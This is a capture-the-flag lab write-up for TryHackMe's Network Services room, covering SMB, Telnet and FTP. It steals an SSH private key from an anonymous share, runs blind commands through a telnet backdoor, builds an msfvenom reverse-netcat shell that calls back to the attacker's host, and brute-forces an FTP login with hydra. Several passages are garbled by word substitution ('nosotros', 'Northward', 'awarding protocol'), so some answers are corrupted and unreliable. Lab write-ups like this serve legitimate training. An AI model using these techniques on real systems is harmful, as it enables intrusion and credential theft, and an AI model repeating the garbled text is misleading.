TryHackMe: Network Services Room Writeup
The room: Learn about, then enumerate and exploit a variety of network services and misconfigurations. https://tryhackme.com/room/networkservices
Task 2: Understanding SMB
All the answers are found in the task description.
What does SMB stand for?
server message block
What type of protocol is SMB?
response-request
What do clients connect to servers using?
tcp/ip
What systems does Samba run on?
unix
Task 3: Enumerating SMB
From this task on is where the fun starts! First, let's set up an env var to make the following commands easier.
export ip=10.10.0.0 # change it to your target machine's ip
Conduct an nmap scan of your choosing. How many ports are open?
Let's run an nmap scan. As a reminder, this is what the flags mean:
- -sV: service/version scan
- --script vuln: run a script scan with the vuln scripts
- -oN nmap-$ip.out: output in normal format to the file
nmap -sV --script vuln -oN nmap-$ip.out $ip
Now to check for open ports from the scan results. Note that a bare grep for "open" will also match any script output that happens to contain the word; the lines of the PORT table are the ones that matter.
cat nmap-$ip.out | grep open
3
What ports is SMB running on?
From the same output above, we can see the two Samba services.
139/445
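As an added example (not part of the original writeup), here is a small shell helper that reads the saved nmap file and pulls out the open ports properly. A bare grep for "open" also matches any vuln-script text that happens to contain the word, so this anchors on the PORT table instead. The scan output embedded below is constructed to mirror the three-port result, with made-up version strings; it is not the room's real output.

```shell
#!/bin/sh
# Added example, not from the original writeup. Parses nmap -oN (normal)
# output for the PORT table instead of grepping for the word "open".
# SAMPLE_NMAP_OUT is a constructed fragment: the version strings are made up
# and the three ports only mirror the count given in the writeup.
SAMPLE_NMAP_OUT="$(cat <<'EOF'
# Nmap 7.91 scan initiated as: nmap -sV --script vuln -oN nmap-10.10.0.0.out 10.10.0.0
Nmap scan report for 10.10.0.0
Host is up (0.042s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done: 1 IP address (1 host up) scanned in 120.00 seconds
EOF
)"

# stdin: nmap normal output; stdout: "port/proto service" for each open port.
# Only lines shaped like "139/tcp open ..." match, so NSE script text is
# ignored; the state must be exactly "open" (open|filtered is left out).
open_ports() {
  awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" { print $1, $3 }'
}

# stdin: nmap normal output; stdout: number of open ports.
count_open() {
  open_ports | wc -l | tr -d ' '
}

# $1: regex matched against the whole open-port line (service or version text);
# stdout: matching port numbers, space separated. ports_for Samba -> "139 445".
ports_for() {
  awk -v pat="$1" '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" && $0 ~ pat {
    split($1, p, "/"); printf "%s ", p[1] }' | sed 's/ $//'
}

echo "open ports: $(printf '%s\n' "$SAMPLE_NMAP_OUT" | count_open)"
echo "smb ports:  $(printf '%s\n' "$SAMPLE_NMAP_OUT" | ports_for Samba)"
```

On a real run, feed the saved file instead of the sample: count_open < nmap-$ip.out. ports_for takes any regex, so ports_for ssh or ports_for '^445/' work the same way.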
Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?
There seems to be no man page for enum4linux, but we can run enum4linux -h to see the flags.
So let's run a -a scan. There's no flag to write to a file, so let's use tee to do that. This will take about 1 minute to run.
enum4linux -a $ip | tee enum4linux-$ip.out
Once you reach the end, or the line below, we can cancel the process with Ctrl-C:
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
Now let's leisurely read the output to find the answers.
less enum4linux-$ip.out
The workgroup name is under the section "Enumerating Workgroup/Domain…"
workgroup
What comes up as the name of the machine?
The hint says to look under OS information. There aren't really any labels, so it's easy to miss.
polosmb
What operating system version is running?
This is in the same place as the machine name, and this time it's labelled!
6.1
What share sticks out as something we might want to investigate?
Let's look further down at the "Share Enumeration…" section. Here is the list of share names.
profiles
Task 4: Exploiting SMB
What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?
The format is given in the task description. The tricky part is the port: since we want the default port, the -p flag is not needed.
smbclient //10.10.10.2/secret -U suit
Does the share permit anonymous access? Y/N?
This directly follows the example syntax above; we only need to substitute different values, which are given in the task description (remember we're interested in the profiles share). So let's run this:
smbclient //$ip/profiles -U Anonymous
A password prompt will appear, but the task description tells us not to supply a password, so just hit Enter.
y
Great! Have a look around for any interesting documents that could contain valuable information. Who can we presume this profile folder belongs to?
Now that we're in the smb console, we only have a limited set of commands. Type help to see what they are. We're looking for interesting documents, so let's ls.
Let's check out the only non-hidden document with more.
more "Working From Home Information.txt"
john cactus
What service has been configured to allow him to work from home?
We can glean this from the file we were just snooping on.
ssh
Okay! Now we know this, what directory on the share should we look in?
ssh is associated with an .ssh folder, so that's our next destination.
.ssh
This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
cd .ssh
ls
The standard key pair is present: id_rsa is the private key, id_rsa.pub is the public key. The most useful is definitely the private key, since whoever holds it can authenticate as its owner.
id_rsa
What is the smb.txt flag?
The smb.txt file is on the main server, so we have to get onto it next. We'll grab John's keys and use them to ssh into the main server.
Let's download both keys to our machine!
mget id_rsa*
Next, open another terminal window and copy both keys into our machine's .ssh directory (mkdir it if it's not present). Then change permissions on the private key, since ssh refuses to use a key that other users can read.
chmod 600 id_rsa
Now we can attempt to ssh into the main server! Before that, check the id_rsa.pub file to find the username in the comment at the end of the file.
ssh cactus@$ip
Quick troubleshooting:
- Load key "/home/kali/.ssh/id_rsa": bad permissions: revisit the chmod step
- load pubkey "/home/kali/.ssh/id_rsa": invalid format: download/copy the public key into .ssh, or generate it with ssh-keygen -y -f id_rsa > id_rsa.pub
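As an added example (not from the original writeup), the key-handling steps above as a script: stage the private key with the permissions ssh insists on, keep or derive the public key, and read the login name from the public key comment. The key files it creates are constructed placeholders, not real key material; cactus@polosmb is an assumed comment built from the names the room gives.

```shell
#!/bin/sh
# Added example, not from the original writeup. Stages a private key recovered
# from a share so ssh will accept it, and reads the login name from the public
# key's trailing comment. The key files created below are constructed
# placeholders (not real key material, not the room's key).

# $1: recovered private key, $2: directory to stage it in. Prints the staged path.
stage_key() {
  key="$1"; dest="$2"
  mkdir -p "$dest" && chmod 700 "$dest"
  cp "$key" "$dest/id_rsa"
  chmod 600 "$dest/id_rsa"   # ssh rejects a key readable by group/others
  if [ -f "$key.pub" ]; then
    cp "$key.pub" "$dest/id_rsa.pub"
  elif command -v ssh-keygen >/dev/null 2>&1; then
    # no .pub recovered: derive it from the private key (needs a real key)
    ssh-keygen -y -f "$dest/id_rsa" > "$dest/id_rsa.pub"
  fi
  printf '%s\n' "$dest/id_rsa"
}

# $1: path to a .pub file. OpenSSH public keys end in a free-text comment,
# conventionally user@host, so the text before '@' is the account the key was
# made for. Prints nothing when the key has no comment.
user_from_pubkey() {
  awk 'NF >= 3 { sub(/@.*/, "", $NF); print $NF; exit }' "$1"
}

# $1: path. Succeeds only when the mode is exactly 0600.
key_perms_ok() {
  [ -n "$(find "$1" -perm 600 -print)" ]
}

# --- constructed sample run (placeholder files, assumed comment) ---
SAMPLE_DIR=$(mktemp -d)
printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'placeholder-not-a-real-key' \
  '-----END OPENSSH PRIVATE KEY-----' > "$SAMPLE_DIR/id_rsa"
printf '%s\n' 'ssh-rsa AAAAB3NzaC1yc2E-placeholder cactus@polosmb' > "$SAMPLE_DIR/id_rsa.pub"
STAGED=$(stage_key "$SAMPLE_DIR/id_rsa" "$SAMPLE_DIR/.ssh")
LOGIN=$(user_from_pubkey "$SAMPLE_DIR/.ssh/id_rsa.pub")
echo "staged $STAGED; try: ssh -i $STAGED $LOGIN@\$ip"
```

The comment is a hint, not a guarantee: key owners can put anything there, so if the derived login fails, fall back to the usernames found elsewhere during enumeration.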
Task 5: Understanding Telnet
All the answers are found in the task description.
What is Telnet?
awarding protocol
What has slowly replaced Telnet?
ssh
How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
telnet 10.10.10.3 23
The lack of what means that all Telnet communication is in plaintext?
encryption
Task 6: Enumerating Telnet
Set the env var again since the machine changed, then run the scan! This will take a while to run, since -p- scans all 65535 TCP ports.
export ip=10.10.0.0 # change it to your target machine's ip
nmap -A -oN nmap-$ip.out -p- $ip
How many ports are open on the target machine?
We can get the information for the next few questions by searching for open.
cat nmap-$ip.out | grep open
1
What port is this?
8012
This port is unassigned, but still lists the protocol it's using; what protocol is this?
tcp
Now re-run the nmap scan, without the -p- tag, how many ports prove up as open?
Run the scan again without -p-, output to another file, then search for open again. Nothing will be returned, because the default scan only covers the 1000 most common ports and 8012 is not among them.
nmap -A -oN nmap-$ip-2.out $ip
cat nmap-$ip-2.out | grep open
0
Based on the title returned to us, what do we call back this port could be used for?
Looking back at the original scan results, we can find a line that tells us the answer to the next few questions.
a backdoor
Who could it belong to? Gathering possible usernames is an important step in enumeration.
skidy
Task 7: Exploiting Telnet
Great! It's an open telnet connection! What welcome message do we receive?
Our next step is to try opening a telnet connection. Install telnet if it's not present. The port used by telnet here is custom; we saw it earlier while scanning the machine. Once we get in, we'll see a welcome message.
sudo apt install telnet
telnet $ip 8012
SKIDY'S BACKDOOR.
Allow's try executing some commands, do nosotros get a return on whatsoever input nosotros enter into the telnet session? (Y/Northward)
Based on the welcome bulletin, we know to use          .Aid          to cheque for bachelor commands.
              
            
Then, try doing a          .RUN. There are no return values nor acknowledgement.
n
Now, use the command "ping [local tun0 ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
In another terminal session, run ifconfig and check for our local ip under tun0. For convenience, save it to an env var.
ifconfig
export lhost=10.9.0.0 # change it to your machine's ip
In the same terminal, run tcpdump according to the task description.
sudo tcpdump ip proto \\icmp -i tun0
Then back in the telnet session, run a ping to your machine, following the task description.
.RUN ping 10.9.0.0 -c 1 # replace with your machine's ip
Check the terminal session running tcpdump. There should be 2 packets logged (the echo request and our reply). This means the ping from the target machine to our machine succeeded, and implies we are able to execute system commands blind, with no output returned to the telnet session.
y
We're going to generate a reverse shell payload using msfvenom. What word does the generated payload start with?
We don't need tcpdump anymore, so kill it. Let's set the lport env var for convenience (we have set lhost earlier). Then run msfvenom following the syntax in the task description to generate the payload.
export lport=4444
msfvenom -p cmd/unix/reverse_netcat lhost=$lhost lport=$lport R
The final line is the payload. It's basically a command that starts with mkfifo and uses netcat.
mkfifo
What would the command look like for the listening port we selected in our payload?
The syntax is in the task description. This is what the flags mean:
- -l: listen mode, for inbound connections
- -v: verbose
- -p: specify the local port (in our case, the port we are listening on)
nc -lvp 4444
Success! What is the contents of flag.txt?
First run the netcat command to listen on our lport.
nc -lvp $lport
Then in the telnet session, run the payload generated by msfvenom earlier (basically copy/paste the entire last line into the telnet session, prefixed with .RUN).
Once the payload is run, the netcat session from before will respond. We now have a reverse shell to the target! We can use this netcat session to send commands to the target machine. Run ls to get a list of files; we will see flag.txt. Print out its contents and we're done here!
Task 8: Understanding FTP
Most of the answers are found in the task description.
What communications model does FTP employ?
We can find this info in the task description.
client-server
What'south the standard FTP port?
We can find this by googling around.
21
How many modes of FTP connection are at that place?
Active mode and passive mode.
2
Task 9: Enumerating FTP
How many ports are open on the target machine?
Let's do our usual scan on this machine; this will take a while.
export ip=10.10.0.0 # change it to your target machine's ip
nmap -sV -oN nmap-$ip.out $ip
cat nmap-$ip.out | grep open
2
What port is ftp running on?
21
What variant of FTP is running on it?
vsftpd
What is the name of the file in the anonymous FTP directory?
Login following the instructions from the task description. We can use help to view available commands, then ls to list the files.
PUBLIC_NOTICE.txt
What do we think a possible username could be?
Let's snoop on the notice!
get PUBLIC_NOTICE.txt -
(the trailing - writes the file to the terminal instead of saving it locally)
mike
Task 10: Exploiting FTP
What is the password for the user "mike"?
Say bye to ftp for now, then run the command from the task description with our user.
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV $ip ftp
password
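As an added example (not from the original writeup), a helper that parses hydra's hit line instead of retyping the credentials, and turns them into a non-interactive curl fetch over FTP. The hydra transcript embedded below is constructed to match the shape of hydra's output; only the host placeholder and the recovered password come from this writeup.

```shell
#!/bin/sh
# Added example, not from the original writeup. Pulls the credentials out of
# hydra's result line so they can feed a non-interactive fetch, instead of
# reading them off the screen. SAMPLE_HYDRA_OUT is a constructed transcript
# shaped like hydra's output; the host placeholder and the password are the
# writeup's.
SAMPLE_HYDRA_OUT="$(cat <<'EOF'
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak
[DATA] max 4 tasks per 1 server, overall 4 tasks
[DATA] attacking ftp://10.10.0.0:21/
[21][ftp] host: 10.10.0.0   login: mike   password: password
1 of 1 target successfully completed, 1 valid password found
EOF
)"

# stdin: hydra output; stdout: one "login:password" per hit. Hit lines look like
# "[21][ftp] host: H   login: U   password: P"; the password is taken as the
# rest of the line so passwords containing spaces survive.
hydra_creds() {
  awk '/^\[[0-9]+\]\[[a-z0-9-]+\] host: / {
    u = $0; sub(/.*login: +/, "", u); sub(/ +password: .*/, "", u)
    p = $0; sub(/.*password: +/, "", p)
    print u ":" p }'
}

# $1: user, $2: password, $3: host, $4: remote file. Prints a curl command
# that fetches the file over FTP without an interactive session.
ftp_fetch_cmd() {
  printf "curl -s -u '%s:%s' 'ftp://%s/%s'\n" "$1" "$2" "$3" "$4"
}

CREDS=$(printf '%s\n' "$SAMPLE_HYDRA_OUT" | hydra_creds)
echo "found: $CREDS"
echo "fetch: $(ftp_fetch_cmd "${CREDS%%:*}" "${CREDS#*:}" 10.10.0.0 ftp.txt)"
```

In practice you would pipe hydra straight in (hydra ... $ip ftp | hydra_creds) and hand the result to the fetch command; the interactive ftp session shown below does the same thing by hand.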
What is ftp.txt?
Now that we've got Mike's password, let's repeat the steps and try to get to the file.
ftp $ip
mike
password
ls
get ftp.txt -
Source: https://medium.com/dont-code-me-on-that/tryhackme-network-services-room-writeup-e00f88b7b599